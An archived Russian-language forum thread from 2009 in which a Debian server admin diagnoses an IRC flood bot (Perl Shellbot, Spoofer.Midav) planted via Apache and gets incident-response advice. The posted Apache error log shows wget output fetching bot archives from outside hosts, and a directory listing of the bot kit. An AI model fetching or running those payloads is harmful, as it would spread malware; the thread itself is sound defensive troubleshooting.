Ru-Board.club
← Вернуться в раздел «UNIX»

» вирус на debian поедает трафик

Автор: vovansystems
Дата сообщения: 03.03.2009 19:14
сервак начал жрать трафик немерено. во время этих приступов почти не пингуется и ссш не коннектится проверил clamscan

/home/backup/03-03-09/custom/var/spool/virtual.tar.gz: Spoofer.Midav FOUND
/home/backup/03-03-09/custom/var/spool/virtual.tar.gz: moved to '/home/infected///virtual.tar.gz'
/home/infected/virtual.tar.gz: Spoofer.Midav FOUND
File excluded '/home/infected/virtual.tar.gz'
/var/spool/virtual/.fl/v: Spoofer.Midav FOUND
/var/spool/virtual/.fl/v: moved to '/home/infected///v'
/var/tmp/mcroot.txt: Trojan.Perl.Shellbot FOUND
/var/tmp/mcroot.txt: moved to '/home/infected///mcroot.txt'
/var/tmp/mcroot.txt.3: Trojan.Perl.Shellbot FOUND
/var/tmp/mcroot.txt.3: moved to '/home/infected///mcroot.txt.3'
/var/tmp/mcroot.txt.2: Trojan.Perl.Shellbot FOUND
/var/tmp/mcroot.txt.2: moved to '/home/infected///mcroot.txt.2'
/var/tmp/bb.tar: Spoofer.Midav FOUND
/var/tmp/bb.tar: moved to '/home/infected///bb.tar'
/var/tmp/mcroot.txt.4: Trojan.Perl.Shellbot FOUND
/var/tmp/mcroot.txt.4: moved to '/home/infected///mcroot.txt.4'
/var/tmp/.../v: Spoofer.Midav FOUND
/var/tmp/.../v: moved to '/home/infected///v.000'
/var/tmp/.../bb/v: Spoofer.Midav FOUND
/var/tmp/.../bb/v: moved to '/home/infected///v.001'
/var/tmp/bb.tar.1: Spoofer.Midav FOUND
/var/tmp/bb.tar.1: moved to '/home/infected///bb.tar.1'
/var/tmp/mcroot.txt.1: Trojan.Perl.Shellbot FOUND
/var/tmp/mcroot.txt.1: moved to '/home/infected///mcroot.txt.1'
/var/tmp/mcroot.txt.5: Trojan.Perl.Shellbot FOUND
/var/tmp/mcroot.txt.5: moved to '/home/infected///mcroot.txt.5'

поставил clamav-daemon но через некоторое время опять началось.

пытался через iftop -BP узнать что это но ссш отключло перед тем как он показал кто и куда ломанулся.. что делать..
Автор: Cheery
Дата сообщения: 03.03.2009 19:18
vovansystems
сервисы то какие на нем?
каким юзверем созданы файлы?
Автор: vovansystems
Дата сообщения: 03.03.2009 20:19
нашол где он. папку переименовал, убрал атрибуты на исполнение. вопрос: как он туда залез и почему юзер апач? Apache 2.2.10, directadmin..

YME001:/var/spool/virtual/.fl# ls -ls
total 696
4 -rwxr-xr-x 1 apache apache 74 2009-03-03 21:00 1
4 -rwxr-xr-x 1 apache apache 319 2009-02-22 04:07 autorun
12 -rwxr-xr-x 1 apache apache 8922 2006-01-24 08:18 b
20 -rwxr-xr-x 1 apache apache 19557 2005-05-10 07:50 b2
268 -rwxr-xr-x 1 apache apache 266463 2005-05-10 07:50 bang.txt
4 -rw-r--r-- 1 apache apache 56 2009-03-02 21:41 cron.d
12 -rwxr-xr-x 1 apache apache 8687 2006-01-24 09:12 f
16 -rwxr-xr-x 1 apache apache 14679 2005-11-03 08:28 f4
4 -rw-r--r-- 1 apache apache 23 2009-03-02 21:41 fl.dir
16 -rw-r--r-- 1 apache apache 13022 2009-03-03 10:55 FlooD.seen
4 -rw-r--r-- 1 apache apache 1915 2009-03-03 21:00 FLooD.seen
4 -rwxr-xr-x 1 apache apache 81 2006-08-17 06:40 fwd
156 -rwxr-xr-x 1 apache apache 152108 2001-06-01 14:15 httpd
12 -rwxr-xr-x 1 apache apache 10848 2005-05-29 23:17 j
16 -rwxr-xr-x 1 apache apache 13850 2005-05-29 23:23 j2
24 -rwxr-xr-x 1 apache apache 22983 2004-07-30 01:37 mech.help
4 -rwxr-xr-x 1 apache apache 1064 2009-03-03 21:00 mech.levels
4 -rwx--x--x 1 apache apache 5 2009-03-03 20:48 mech.pid
4 -rw-r--r-- 1 apache apache 199 2009-03-03 21:00 mech.session
4 -rwxr-xr-x 1 apache apache 448 2009-02-24 03:17 mech.set
4 -rwxr-xr-x 1 apache apache 67 2009-02-22 04:05 run
16 -rwxr-xr-x 1 apache apache 15078 2005-02-20 19:51 s
20 -rwxr-xr-x 1 apache apache 16776 2002-09-19 08:59 sl
4 -rwxr-xr-x 1 apache apache 16 2009-02-22 04:06 start
16 -rwxr-xr-x 1 apache apache 15195 2004-09-02 21:34 std
12 -rwxr-xr-x 1 apache apache 8790 2006-01-24 08:39 stream
8 -rwxr-xr-x 1 apache apache 7091 2006-01-24 08:25 tty
4 -rwxr--r-- 1 apache apache 202 2009-03-02 21:41 update
16 -rwxr-xr-x 1 apache apache 14841 2005-07-22 18:42 v2
4 -rwxr-xr-x 1 apache apache 915 2005-03-02 08:59 x

ну ещё из сервисов:
Apache 2.2.10
DirectAdmin
Exim 4.67
MySQL 5.0.67
Named 9.3.4
ProFTPd 1.3.1
sshd
dovecot 1.1.4
openvpn
rinetd
через screen rtorrnet
Автор: SysCommander
Дата сообщения: 03.03.2009 23:22

Цитата:
вопрос: как он туда залез


это как раз вопрос к админу сервера


Цитата:
почему юзер апач


потому что скорее всего тачку на уши через web сервер поставили, если апач смотрит в интернет
Автор: Cheery
Дата сообщения: 04.03.2009 00:08
vovansystems

Цитата:
вопрос: как он туда залез и почему юзер апач?

потому что один из скриптов, скорее всего, с дырой
позволяющей указывать путь сохранения файла залитого через upload
либо залит webshell

смотрите логи апача куда и с каким запросами лезут, если не трут.
проверяйте версии скриптов на дыры.. к примеру поиском тут http://secunia.com/advisories/search/
Автор: vovansystems
Дата сообщения: 04.03.2009 02:13
в логе ошибок апача интересно

Код: [Mon Mar 02 19:19:30 2009] [error] [client 60.242.38.97] File does not exist: /var/www/html/roundcubemail
[Mon Mar 02 19:19:30 2009] [error] [client 60.242.38.97] File does not exist: /var/www/html/404.shtml
--19:19:45-- http://www.freewebtown.com/unknownf/bb.tar
=> `bb.tar'
Resolving www.freewebtown.com... 208.75.230.43
Connecting to www.freewebtown.com|208.75.230.43|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 206,136 (201K) [application/x-tar]

0K .......... .......... .......... .......... .......... 24% 97.82 KB/s
50K .......... .......... .......... .......... .......... 49% 446.57 KB/s
100K .......... .......... .......... .......... .......... 74% 483.83 KB/s
150K .......... .......... .......... .......... .......... 99% 495.59 KB/s
200K . 100% 18.17 MB/s

19:19:46 (243.30 KB/s) - `bb.tar' saved [206136/206136]

./start.sh: line 1: /#bin/bash: No such file or directory

[Mon Mar 02 20:31:57 2009] [error] [client 85.17.201.211] script '/var/www/html/wp-app.php' not found or unable to stat
[Mon Mar 02 20:31:57 2009] [error] [client 85.17.201.211] File does not exist: /var/www/html/404.shtml

[Mon Mar 02 21:36:03 2009] [error] [client 92.48.106.120] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.I
--21:41:54-- http://moltodos.com/admin/boti/fl.tgz
=> `fl.tgz'
Resolving moltodos.com... 82.223.114.200
Connecting to moltodos.com|82.223.114.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208,016 (203K) [application/x-gzip]

0K .......... .......... .......... .......... .......... 24% 121.82 KB/s
50K .......... .......... .......... .......... .......... 49% 320.65 KB/s
100K .......... .......... .......... .......... .......... 73% 329.38 KB/s
150K .......... .......... .......... .......... .......... 98% 334.98 KB/s
200K ... 100% 13.75 MB/s

21:41:56 (234.13 KB/s) - `fl.tgz' saved [208016/208016]

./run: line 1: /#bin/bash: No such file or directory
[Mon Mar 02 21:52:14 2009] [error] [client 84.19.184.189] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.I
Автор: Cheery
Дата сообщения: 04.03.2009 02:18

Цитата:
в логе ошибок апача интересно

это показывает выполнение команд. как к вам залили остальной хлам


Цитата:
а где искать вебшел?

смотрите даты изменения файлов.. и появились ли лишние
либо даты выполнения команд видите - смотрите этот период времени в логах, если есть


Цитата:
а вот логи доступа к вебсерверу почему-то пустые:

почистили значит..
либо у вас настройки такие, что пишется в другой файл


Цитата:
File does not exist: /var/www/html/roundcubemail

искали есть ли roundcube


Цитата:
script '/var/www/html/wp-app.php' not found or unable to stat

wordpress


Цитата:
обновил до 0.2 но она вроде как тоже дырявая

ну так если есть список уязвимостей - исправить можно и самостоятельно.


ps: и проверьте что сейчас запущено, а то могли бота какого нить запустить.
так как
http://www.virustotal.com/analisis/040d3ec8db77ca456567e3ab1012913e
http://www.virustotal.com/analisis/257afd4a9993d367666d9abb2f8b1d9b
Автор: vovansystems
Дата сообщения: 04.03.2009 03:49

Цитата:
почистили значит..
либо у вас настройки такие, что пишется в другой файл

да, действительно, в vhosts был указан другой, но формат не позволяет понять что произошло.. поменял формат, настроил ротацию


Цитата:
смотрите даты изменения файлов.. и появились ли лишние
либо даты выполнения команд видите - смотрите этот период времени в логах, если есть

уже все переместил и поменял атрибуты, спасибо


Цитата:
это показывает выполнение команд. как к вам залили остальной хлам

т.е. это вывод wget'a? тогда почему он в логе ошибок, а не в логе доступа?


Цитата:
и проверьте что сейчас запущено, а то могли бота какого нить запустить

проверил, кроме того что нашёл с помощью clamav (а это как раз Spoofer.Midav) кажется ничего подозрительного нет

всё это приводит к следующему вопросу - как обезопасить себя от подобных дырок в скриптах (у реселлеров в том числе) на будущее? запускать php в safe_mode?

спасибо за разжёвывание и оперативную помощь! теперь буду следить откуда высунутся уши
Автор: Cheery
Дата сообщения: 04.03.2009 04:03
vovansystems

Цитата:
т.е. это вывод wget'a? тогда почему он в логе ошибок, а не в логе доступа?

потому что весь системный вывод идет в error.log


Цитата:
всё это приводит к следующему вопросу - как обезопасить себя от подобных дырок в скриптах (у реселлеров в том числе) на будущее?

сами ответили..

Цитата:
запускать php в safe_mode

либо отключать системные функции (может повлиять на работу некоторых скриптов)
есть еще такие вещи как suphp, к примеру.
но ведь тут, по сути, бреши нет - прав никто у вас не получил, просто с правами юзверя (апача) смогли что то запустить. Правда не повторяйте то, что было у Взора - когда с апачевскими правами вынесли все файлы.
Я к тому, что если разрешаете юзверям что то запускать, и у них будет дыра в скрипте, то эффект будет тем же
Поэтому дополнительные настройки по обрезанию доступа при "кушании" ресурсов, длительности выполнения скриптов и тд и тп.. будет неплохо
Автор: tankistua
Дата сообщения: 04.03.2009 08:38
сделай виртуалхосты если их нет, дефолтным выставь какую-нибудь заглушку, если у тебя нет сайта


Код: <VirtualHost *:80>
ServerAdmin admin@cosssacksandco.com
DocumentRoot "/usr/local/www/html"
ServerName lawyer
ServerAlias lawyer.cossacksandco
ServerAlias lawyer.cossacksandco.com
ServerAlias lawyer.cac.net.ua
ErrorLog "/var/log/httpd-www-error_log"
CustomLog "/var/log/httpd-www-access_log" common
<Directory "/usr/local/www/html">
<------>Options Indexes FollowSymLinks
<------>AllowOverride None
<------>Order allow,deny
<------>Allow from 192.168.7.0/24
<------>Allow from 82.144.200.87
</Directory>
</VirtualHost>
Автор: keyhell
Дата сообщения: 04.03.2009 09:37
На скомпрометированной машине нужно делать только одно: искать как проникли в систему (отключать ее от сетей или нет зависит от конкретной задачи - может для исследований и понадобится, чтобы она была в сети и имела доступ к Интернету).

Систему после расследования надо снести и поставить начисто. Дыру закрыть, за новой машиной следить внимательно.

Страницы: 1

Предыдущая тема: Zenit GNU/Linux


Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.